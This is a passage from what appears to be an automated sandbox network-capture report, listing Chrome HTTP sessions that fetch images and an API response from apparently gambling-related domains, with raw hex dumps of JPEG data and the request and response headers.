                                                                                                                                                          2024-06-09 22:41:22 UTC1119INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff e1 03 8d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                                          Data Ascii: ExifII*DuckyPhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xm
                                                                                                                                                          2024-06-09 22:41:22 UTC4096INData Raw: 11 00 02 11 01 03 11 01 ff c4 00 c4 00 00 02 03 01 01 01 01 01 00 00 00 00 00 00 00 00 05 06 03 04 07 02 08 01 00 09 01 00 02 02 03 01 01 00 00 00 00 00 00 00 00 00 00 02 03 01 04 00 05 06 07 08 10 00 01 03 03 03 01 05 05 03 0a 03 06 07 01 00 00 01 02 03 04 00 11 05 21 12 06 31 41 51 22 13 07 61 71 81 32 14 42 72 15 91 a1 b1 c1 d1 52 62 23 16 08 a2 43 24 f0 82 b2 c2 63 25 e1 92 d2 33 53 73 93 34 11 00 01 03 02 04 02 05 07 06 0c 05 02 07 00 00 00 01 00 02 03 11 04 21 31 12 05 41 06 51 61 71 22 13 81 91 a1 b1 32 14 07 d1 42 52 62 92 93 c1 e1 82 c2 d2 23 33 53 24 54 16 17 72 b2 e2 63 15 43 d3 f0 f1 a2 73 83 44 55 ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 f3 5c a0 85 ad 7f 7c d8 fc 6b df 4f 05 e1 4d cd 49 16 32 8b 24 df 4a 87 8c 2a 9b 19 c6 88 b4 16 49 43 ff
                                                                                                                                                          Data Ascii: !1AQ"aq2BrRb#C$c%3Ss4!1AQaq"2BRb#3S$TrcCsDU?\|kOMI2$J*IC
                                                                                                                                                          2024-06-09 22:41:22 UTC4096INData Raw: 91 72 c2 f6 7f a6 ef 39 5b 0f a4 f8 0e 47 ea 3e 69 ac 34 29 72 5a 8b 15 21 dc c6 48 ad 65 2c 33 7b 5e f7 b1 5a ba 24 76 9d 7a 02 47 31 cd bb be db cb d6 46 79 21 8c bc e0 c6 e9 6f 79 de 6f 64 66 e3 d1 d6 42 db ec 9b 75 de eb 72 23 6c 8e 0d 18 b8 d4 f7 47 ca 78 0f c1 55 07 2e 83 9b e2 5c 93 31 c7 a6 4c 90 a7 71 92 14 da 1c 2e 28 79 8d 1f 13 4e 75 fb 68 21 5f 1a d9 f2 fc 96 1b bd 84 37 6c 86 3a 48 d0 48 d2 dc 1d 93 9b 97 cd 70 23 c8 a9 6e 91 dc d8 dc c9 03 a4 77 74 d3 33 88 e0 7c a2 85 68 3c 61 b5 b3 e8 ef a8 9c b2 52 9c 90 ea a4 b1 88 8a 87 54 54 52 55 e5 a5 65 17 bf d9 93 7f 85 70 bc c7 6b 05 c7 35 ed 96 8c 63 5a 23 0e 98 e9 00 65 52 da d3 ae 21 e7 5d 2e d1 2c 91 6c 97 93 b9 c5 c5 e4 46 2a 7b 01 f4 3f d0 91 fd 2e f4 e3 2b ea 8e 61 f8 f1 f7 c2 c2 63 76 9c
                                                                                                                                                          Data Ascii: r9[G>i4)rZ!He,3{^Z$vzG1Fy!oyodfBur#lGxU.\1Lq.(yNuh!_7l:HHp#nwt3|h<aRTTRUepk5cZ#eR!].,lF*{?.+acv
                                                                                                                                                          2024-06-09 22:41:22 UTC1400INData Raw: 16 9e f5 c5 c4 71 f9 2b 5f 58 6a ed 39 1d 85 b7 52 dc b8 61 14 4f 7f 97 2f 55 56 87 e8 97 1d 91 8c 92 e7 37 e6 c8 43 4f c4 52 9c c3 44 71 41 76 58 d5 52 9c ec d3 ec 7b 7c 5f bb 5c 77 c5 2e 74 2f 78 d9 36 da 97 3a 8d 93 4e 78 e0 21 6f 59 f9 ff 00 63 e9 05 d0 f2 57 2e 69 69 dc af 28 1a 2a 59 5f 4c 87 f3 7e d7 42 07 ea 47 a9 1c e3 9e 67 89 82 c3 d8 ec 06 3c a9 ac 53 2b 74 b6 54 09 f1 3c e0 49 f9 97 6d 07 60 d3 ad ef dd f2 27 23 db ec 36 40 4c d0 fb 87 d0 bc d0 1a 74 31 b5 e0 de 9f 9c 6a 72 a0 1c bf 33 73 24 bb 9d cd 63 71 6c 4d c1 a2 b4 af d6 3d 67 d0 30 e9 4a 51 e0 e6 1c 01 79 3c cc 97 0f 52 cb 4e ad 29 fc b7 d6 bb 8f 72 80 ff 00 d3 6f d9 1f 22 e6 fd e6 41 f3 dd e7 2b 72 f4 7f 98 ca e3 79 79 78 b7 65 3a e4 3c bb 60 a1 2b 59 50 43 cc 02 a4 91 72 6d 74 95 03
                                                                                                                                                          Data Ascii: q+_Xj9RaO/UV7CORDqAvXR{|_\w.t/x6:Nx!oYcW.ii(*Y_L~BGg<S+tT<Im`'#6@Lt1jr3s$cqlM=g0JQy<RN)ro"A+ryyxe:<`+YPCrmt
                                                                                                                                                          2024-06-09 22:41:22 UTC2900INData Raw: 7b 6d ac 4f f1 65 21 f7 0f 73 5e c7 3d ad 15 99 ae 2f a1 7d 5f ab 11 a9 ad 22 8d 76 6b 6c 6e af 6d 05 f5 e4 ef 6f 86 c0 5b 0b 41 6b 83 4b 8d 23 73 43 6b a7 bb 4c 30 71 ae 21 78 56 48 25 0e 2d 44 a8 93 75 28 ea 49 35 f4 f0 14 0b c4 89 42 5f 48 08 49 1d b5 8a 09 43 94 a2 74 a6 84 b7 2a 8b a6 04 b2 a2 a2 42 9f 1b 48 de ab f7 9a d7 70 5b 21 9a 2c c8 1a 52 9c 9e d5 7b 7a 52 3b 0d 2c a6 05 49 fc 82 59 4a ad f1 a9 0d 58 5d 44 c9 c6 78 aa b2 8b 6f 2d 99 6b 6c 54 9d f1 21 11 aa fb 94 bf 67 70 a0 7b f8 04 41 b4 c4 e6 b6 46 32 4d c0 65 f8 c8 21 a4 c8 40 41 48 d0 04 8b e9 5e 23 f1 0f 7d b4 b2 e6 0d b1 b7 6e d3 14 5a e5 75 01 76 27 08 f0 18 fb 4c f4 95 e9 3c a3 b5 5c 5d 6d 37 a6 01 59 24 d2 c1 88 19 62 ec 4f d5 72 e9 dc f3 af 34 58 72 7a d4 d1 00 16 ef a5 87 41 6a 45
                                                                                                                                                          Data Ascii: {mOe!s^=/}_"vklnmo[AkK#sCkL0q!xVH%-Du(I5B_HICt*BHp[!,R{zR;,IYJX]Dxo-klT!gp{AF2Me!@AH^#}nZuv'L<\]m7Y$bOr4XrzAjE
                                                                                                                                                          2024-06-09 22:41:22 UTC1400INData Raw: 68 2e 33 c9 32 31 32 2c b7 06 fc 81 29 fa e4 3c da 63 bb e7 79 0d 29 09 25 2f 24 6e 6c 74 29 bd 69 e4 b7 9a 51 24 83 03 5c 01 06 bd cf 66 98 8a 54 d7 87 15 b7 8e 78 a2 2c 61 c7 0c 48 22 9d ff 00 6a b8 1a d0 75 f0 4b b1 22 41 77 8e e7 f8 1b 79 bc 61 c8 61 f9 0f e2 78 e9 2f ca 6d 88 39 36 5b 69 51 96 1b 92 a5 a5 a4 90 00 5a 37 2c 5c 29 40 1d da 55 92 e2 24 6c c5 a6 85 b4 38 54 b7 8e 59 f5 1c 15 60 01 8d d0 87 0a 87 54 63 83 b8 67 97 a5 19 62 1e 0a 2f 31 f4 99 38 d8 98 bc 76 5d fc 9c 47 39 04 2c 44 e5 4f 8a db 9f 89 6c 62 cf 19 32 d2 09 69 20 90 1c d2 fa 81 7a 12 e7 ba 19 b5 12 5b 43 42 46 93 ec e3 85 1b c7 a9 10 6b 1b 34 3a 40 06 a2 b4 35 1e d6 18 d5 dc 3a d3 b6 04 61 31 38 47 b0 f3 72 58 7c 83 4f 2a 32 92 a3 0f 85 82 8f a6 8f 25 94 95 29 79 65 79 ce 05 3e
                                                                                                                                                          Data Ascii: h.3212,)<cy)%/$nlt)iQ$\fTx,aH"juK"Awyaax/m96[iQZ7,\)@U$l8TY`Tcgb/18v]G9,DOlb2i z[CBFk4:@5:a18GrX|O*2%)yey>
                                                                                                                                                          2024-06-09 22:41:22 UTC82INData Raw: 8b 48 b8 fc d5 2d c5 0b 5d dd a2 0e 4a 92 ab f8 8b c5 42 e3 53 4d e0 ab b9 ad 19 29 f2 06 ed dc 8b 2b 6e a2 86 21 44 2e c9 70 c9 50 4a 2c 0f cb 4f 72 58 50 3c 4d cd 81 bd 1b 50 39 72 2f 6a 94 05 72 7b 69 81 2c aa ab f6 53 02 02 a3 a9 42 bf ff d9
                                                                                                                                                          Data Ascii: H-]JBSM)+n!D.pPJ,OrXP<MP9r/jr{i,SB


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          626192.168.2.55040854.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:21 UTC640OUTGET /pc/image-pc/video/guide.jpg HTTP/1.1
                                                                                                                                                          Host: zb-qq.gzjqwlkj.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://zb-qq.gzjqwlkj.com/pc/240516-03/static/css/t3685.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:22 UTC330INHTTP/1.1 200 OK
                                                                                                                                                          Last-Modified: Sat, 24 Aug 2019 10:08:29 GMT
                                                                                                                                                          Etag: "5d610c9d-12788"
                                                                                                                                                          Server: Tengine
                                                                                                                                                          Date: Sun, 09 Jun 2024 17:13:36 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 75656
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          X-NWS-LOG-UUID: 11468191647385862346
                                                                                                                                                          Connection: close
                                                                                                                                                          X-Cache-Lookup: Cache Hit
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:22 UTC16384INData Raw: ff d8 ff db 00 84 00 02 01 01 01 01 01 02 01 01 02 03 02 01 02 03 03 02 02 02 02 03 03 03 03 03 03 03 03 05 03 04 04 04 04 03 05 05 05 06 06 06 05 05 07 07 08 08 07 07 0a 0a 0a 0a 0a 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 01 02 02 02 04 03 04 07 05 05 07 0a 08 07 08 0a 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff dd 00 04 00 53 ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00 01 ff c0 00 11 08 02 20 02 93 03 00 11 00 01 11 01 02 11 01 ff c4 00 ad 00 00 00 07 01 01 01 01 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 01 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 10 00 01 03 03 03 02 05 02 04 04 04 03 06 05 02 07 01 00 02 03
                                                                                                                                                          Data Ascii: SAdobed
                                                                                                                                                          2024-06-09 22:41:22 UTC16384INData Raw: 83 98 9b 24 43 5d bf a9 d8 1d d0 99 93 20 ec 77 2c c9 80 ef 48 ec 55 f0 67 3f 21 2e 2a ed 5b ea 5a a2 cc 19 11 61 6f b9 34 7f 2c ed 9e e4 a6 d5 95 e3 9d 0e d5 de 58 d3 e5 b4 e4 fd d0 a0 c9 cb 37 74 47 75 78 20 38 bb 74 a8 70 97 61 4b 74 66 32 3f 54 51 b7 17 64 3a 9b a8 c1 3a b7 fb ac f3 67 4f 12 2b aa 6e 40 02 75 6f f7 55 4a 54 6c 8f 44 66 5c 5d 8f 51 c2 a2 52 b2 e1 32 dd 43 19 b3 fd 67 b1 55 ec 4a c3 a7 bb 13 8c bb 7f 85 64 64 04 fa 6b 98 2e 07 52 9a 90 17 14 57 6d 86 0e e3 be 54 f6 13 95 12 d9 75 df 04 ff 00 74 d3 2a 6c 93 4f 73 f7 3b fd d4 ca e5 22 48 ad 07 7d 49 a2 86 c5 1a e7 63 01 c9 94 ca 54 1f f1 0d 3d d4 19 1d 82 9a a3 57 07 95 12 e8 cc 87 53 21 f7 d9 26 5a a4 44 96 46 9d b2 93 27 16 0b 55 5f e1 aa 9b be 41 38 3f 65 9b 22 34 45 9d 43 a5 6b 1a eb
                                                                                                                                                          Data Ascii: $C] w,HUg?!.*[Zao4,X7tGux 8tpaKtf2?TQd::gO+n@uoUJTlDf\]QR2CgUJddk.RWmTut*lOs;"H}IcT=WS!&ZDF'U_A8?e"4ECk
                                                                                                                                                          2024-06-09 22:41:22 UTC16384INData Raw: e3 37 d9 27 c2 df 00 3e 91 bc 2a b2 d4 d9 fa 2f ad a8 6a 0d 73 84 95 15 32 d5 41 2c 92 39 b9 d2 30 cf 4e 06 56 5e 74 b3 72 65 72 7e 0b 30 4b 1e 15 48 aa eb 4f 01 be 99 3a 9e bf f8 55 5f 5a 42 cb 84 b9 78 6b 60 0e c8 e0 e0 8c 85 0c 3c 5c f5 71 4e 8b 25 cb c6 fa 67 2f eb bf f0 c3 f0 7f ab 99 25 47 4a 75 fb a1 9d c3 2d 8d b0 c4 1b 93 c7 e6 6a d9 0e 47 23 1f 98 99 e7 ec b7 e6 8f 06 7d 74 7d 22 f8 fd f4 97 45 4f 70 ea 9b ad ba e5 e1 d5 f2 aa 4b 7d ba ae 86 51 25 41 0c 6f 99 89 a3 c3 74 92 0f 65 d9 e3 66 f7 57 57 6b c9 cc ce d4 5d 74 d1 c7 3c 36 f0 b6 ff 00 d6 f6 af e3 4c b8 c3 4e ca 59 70 d8 64 88 bb 76 ee 0e c5 6a c9 9a 51 e8 8e 1c 31 9a b3 6b 5f 6a eb fb 5c c2 57 dd 69 df a7 07 d3 01 1b b7 b7 2a bc 33 76 4b 3e 3e 88 fe 2a 75 35 ef a8 6e 14 15 57 f7 b2 5a c8
                                                                                                                                                          Data Ascii: 7'>*/js2A,90NV^trer~0KHO:U_ZBxk`<\qN%g/%GJu-jG#}t}"EOpK}Q%AotefWWk]t<6LNYpdvjQ1k_j\Wi*3vK>>*u5nWZ
                                                                                                                                                          2024-06-09 22:41:22 UTC16384INData Raw: 68 38 e1 90 f2 a4 a4 88 4a 63 ad 81 fd ff 00 ba 36 23 b8 7e 53 db c7 09 ec 1b 0b 6c 2f 7e e1 3d c4 e4 28 31 d8 e5 3d ca ec 50 d6 36 69 dd 2f 70 42 db e6 e3 7e 7e 54 96 41 6d 40 f5 73 90 a3 ee 0e c5 02 f7 6c 78 4f dd 15 87 e4 39 c5 1e e0 6c 1f e1 fb e4 23 dc 62 d8 36 d2 f7 ca 5e e0 6e 0f c3 82 7d 40 fe e9 7b 8c 5b 8b 10 46 3e e9 ac 8c 5b 07 e5 c2 39 e5 1e e3 0d 85 32 36 1c 0d b3 f2 8d d9 1d 83 31 3b 56 34 8c 76 c2 36 62 d8 53 60 04 9c b7 6e d8 4f 76 88 b9 06 23 1c 61 1e e0 6e 06 40 d0 ef 72 9f b8 c2 d8 b6 c2 32 76 20 84 7b 92 16 c1 c5 0b 9e 35 01 c2 7e e4 84 e6 3a c8 24 6e d8 df d9 1e f4 88 b9 96 d2 75 07 52 58 7a 55 bf 86 9e 56 59 04 c5 a4 48 cf 36 97 ce 23 56 34 38 39 a1 d8 3e cb 87 ea 91 6e 76 fe 8f a3 fe 8d f5 35 0c 12 c7 7f 3f 46 ef e9 3b c7 6e ae a0
                                                                                                                                                          Data Ascii: h8Jc6#~Sl/~=(1=P6i/pB~~TAm@slxO9l#b6^n}@{[F>[9261;V4v6bS`nOv#an@r2v {5~:$nuRXzUVYH6#V489>nv5?F;n
                                                                                                                                                          2024-06-09 22:41:22 UTC10120INData Raw: 09 38 a6 4a 39 a4 88 72 53 d4 d2 48 1c d7 7e 53 b3 da 78 29 55 17 a9 a9 13 65 eb cb a9 96 9d b7 07 99 65 a7 d9 93 1d de 1b ec 49 e4 7d d2 dd 2e 8d 18 ad 16 90 5c ed d7 48 5f fc 37 43 67 97 d5 23 1d fe 6f 8c f1 fa 29 27 64 ed 26 58 b6 c7 15 e2 d7 e6 59 aa 3f 11 5b 1b 74 54 d2 ca d6 b6 40 07 b0 ef 84 b6 af 20 df 7d 99 5a ab 43 e2 91 ed 68 20 b4 e3 4b 86 1c 3e e0 a6 67 ca d4 58 d7 e0 26 ff 00 2a 74 57 ee 23 ff d2 f8 f4 d7 69 0d 90 1c 30 60 37 7c 12 7e 17 a4 39 83 86 60 64 d2 f6 90 01 d4 0b f6 d9 20 1e 64 e4 b7 4c ef 1e 51 18 69 d8 8f ba 90 04 ca a6 32 4f 31 b2 79 84 0d 9d 8e 3e ca 22 1e d4 fa 97 e8 79 38 d3 a8 64 ec 40 28 24 2e 2a 88 22 94 68 27 49 1b b8 8d c1 ff 00 92 4c 89 2c d3 8a 8a 76 d6 49 20 00 90 1a ce 49 68 ee 12 a2 54 38 c9 5a 35 60 ca 43 b8 70 c1
                                                                                                                                                          Data Ascii: 8J9rSH~Sx)UeeI}.\H_7Cg#o)'d&XY?[tT@ }ZCh K>gX&*tW#i0`7|~9`d dLQi2O1y>"y8d@($.*"h'IL,vI IhT8Z5`Cp


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          627192.168.2.550404103.117.134.214434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:21 UTC385OUTGET /zb-cloud/pwv/sn.notice.new.layer.query HTTP/1.1
                                                                                                                                                          Host: ocsapi-lc.tingmeikj.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:22 UTC17INHTTP/1.1 200 OK
                                                                                                                                                          2024-06-09 22:41:22 UTC23INData Raw: 53 65 72 76 65 72 3a 20 54 65 6e 67 69 6e 65 2f 32 2e 33 2e 30 0d 0a
                                                                                                                                                          Data Ascii: Server: Tengine/2.3.0
                                                                                                                                                          2024-06-09 22:41:22 UTC37INData Raw: 44 61 74 65 3a 20 53 75 6e 2c 20 30 39 20 4a 75 6e 20 32 30 32 34 20 32 32 3a 34 31 3a 32 32 20 47 4d 54 0d 0a
                                                                                                                                                          Data Ascii: Date: Sun, 09 Jun 2024 22:41:22 GMT
                                                                                                                                                          2024-06-09 22:41:22 UTC16INData Raw: 61 70 69 2d 65 6c 61 70 73 65 64 3a 20 30 0d 0a
                                                                                                                                                          Data Ascii: api-elapsed: 0
                                                                                                                                                          2024-06-09 22:41:22 UTC34INData Raw: 78 2d 73 65 72 76 65 72 3a 20 41 6b 61 6d 61 69 4e 65 74 53 74 6f 72 61 67 65 28 6a 70 31 36 29 0d 0a
                                                                                                                                                          Data Ascii: x-server: AkamaiNetStorage(jp16)
                                                                                                                                                          2024-06-09 22:41:22 UTC32INData Raw: 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a
                                                                                                                                                          Data Ascii: Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:22 UTC82INData Raw: 58 2d 56 69 61 3a 20 31 2e 31 20 61 77 73 3a 6a 70 20 28 43 64 6e 20 43 61 63 68 65 20 53 65 72 76 65 72 20 56 32 2e 30 29 2c 20 31 2e 31 20 6f 63 73 61 70 69 3a 30 30 20 28 43 64 6e 20 43 61 63 68 65 20 53 65 72 76 65 72 20 56 32 2e 30 29 0d 0a
                                                                                                                                                          Data Ascii: X-Via: 1.1 aws:jp (Cdn Cache Server V2.0), 1.1 ocsapi:00 (Cdn Cache Server V2.0)
                                                                                                                                                          2024-06-09 22:41:22 UTC36INData Raw: 58 2d 43 61 63 68 65 3a 20 4d 49 53 53 20 66 72 6f 6d 20 73 67 31 2d 63 64 6e 62 31 33 34 2d 30 32 31 0d 0a
                                                                                                                                                          Data Ascii: X-Cache: MISS from sg1-cdnb134-021
                                                                                                                                                          2024-06-09 22:41:22 UTC20INData Raw: 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 34 0d 0a
                                                                                                                                                          Data Ascii: Content-Length: 24
                                                                                                                                                          2024-06-09 22:41:22 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                                                                                                                          Data Ascii: Connection: close
                                                                                                                                                          2024-06-09 22:41:22 UTC2INData Raw: 0d 0a
                                                                                                                                                          Data Ascii:


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          628192.168.2.55040943.201.120.1604434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:21 UTC372OUTGET /pc/image-pc/video/sunbet_h.jpg HTTP/1.1
                                                                                                                                                          Host: zb-qq.gzjqwlkj.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:22 UTC347INHTTP/1.1 200 OK
                                                                                                                                                          Server: Tengine
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:22 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          ETag: "5ab34b0d-4e3b"
                                                                                                                                                          Via: 1.1 google
                                                                                                                                                          Last-Modified: Thu, 22 Mar 2018 06:19:57 GMT
                                                                                                                                                          Content-Length: 20027
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          X-NWS-LOG-UUID: 18152188609848161138
                                                                                                                                                          Connection: close
                                                                                                                                                          X-Cache-Lookup: Cache Miss
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:22 UTC1119INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff e1 03 8d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                                          Data Ascii: ExifII*DuckyPhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xm
                                                                                                                                                          2024-06-09 22:41:22 UTC14000INData Raw: 11 00 02 11 01 03 11 01 ff c4 00 bd 00 00 01 04 03 01 01 00 00 00 00 00 00 00 00 00 00 07 01 04 05 06 02 03 08 00 09 01 00 01 05 01 01 01 00 00 00 00 00 00 00 00 00 00 02 01 03 04 05 06 00 07 08 10 00 02 01 03 03 03 02 04 03 06 03 03 0a 07 00 00 01 02 03 11 04 05 00 12 06 21 31 13 41 07 51 61 22 14 71 32 23 81 91 42 52 15 08 a1 b1 33 d1 62 16 c1 82 43 24 34 d4 55 95 17 18 e1 72 92 53 63 44 25 11 00 02 01 02 04 04 03 04 06 05 0b 03 05 00 00 00 01 02 11 00 03 21 31 12 04 41 51 22 05 61 13 06 71 81 32 42 91 a1 52 23 14 07 b1 c1 d1 62 d2 f0 e1 72 82 92 b2 33 93 24 15 16 a2 43 53 f1 b3 74 55 17 ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 e2 02 41 1d 35 f4 45 78 05 60 e6 a7 e3 a5 ae a4 0d b6 b4 d2 57 56 00 fe ed 24 51 03 48 49 27 5d 15 da 8d 6b 6a eb a2 90 93 49
                                                                                                                                                          Data Ascii: !1AQa"q2#BR3bC$4UrScD%!1AQ"aq2BR#br3$CStU?A5Ex`WV$QHI']kjI
                                                                                                                                                          2024-06-09 22:41:22 UTC4908INData Raw: ac 01 a5 48 a6 b6 1e a6 f4 7e f3 b9 6f ac ee 2c f9 4d a6 d7 96 56 e2 eb 59 04 b4 81 23 d8 3f 9e b3 be 9d f5 2e d7 65 b6 bb 62 ee b1 aa e6 b0 ca da 4c 40 10 70 3e da e6 49 ad 30 59 9c e2 be 24 5d c3 6f 1c 8f 2e 5f ee 9f c8 c6 76 24 bb 16 08 bd 85 7a 1f 5d 6f 7d 3d fe e9 b6 db 1b 5b f0 84 88 09 a1 74 8d 20 44 41 66 f7 65 85 51 77 96 d9 5d bb af 6b ab 19 2d a8 cf 57 39 81 44 7e 57 7c 33 b0 99 c4 26 37 8b 12 69 01 ea 7e 90 11 7f cc 6a 97 d1 fd 8e ef 67 4b b6 ae 10 da af 33 82 39 36 3f 55 4b f5 0f 75 b7 dc 1e db a0 22 2d aa 91 e2 2b 9d 79 15 b7 8a f2 50 a3 e8 b7 09 06 ef 8b 22 8a eb d2 b6 8f 2a 3c 71 ac 96 ed 38 d4 34 37 57 28 3c 6b 3b 84 1f c1 5e 9f bb 52 1a da 9e 14 cd ab cf ce a7 ec 66 69 00 24 f5 f5 d4 57 58 ca ac 11 8b 54 d8 5a 8a e9 aa 70 8a f5 3d 35 d4
                                                                                                                                                          Data Ascii: H~o,MVY#?.ebL@p>I0Y$]o._v$z]o}=[t DAfeQw]k-W9D~W|3&7i~jgK396?UKu"-+yP"*<q847W(<k;^Rfi$WXTZp=5


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          629192.168.2.55041390.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:21 UTC383OUTGET /pc/image-pc/index/312/nav/liveCasino/02.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
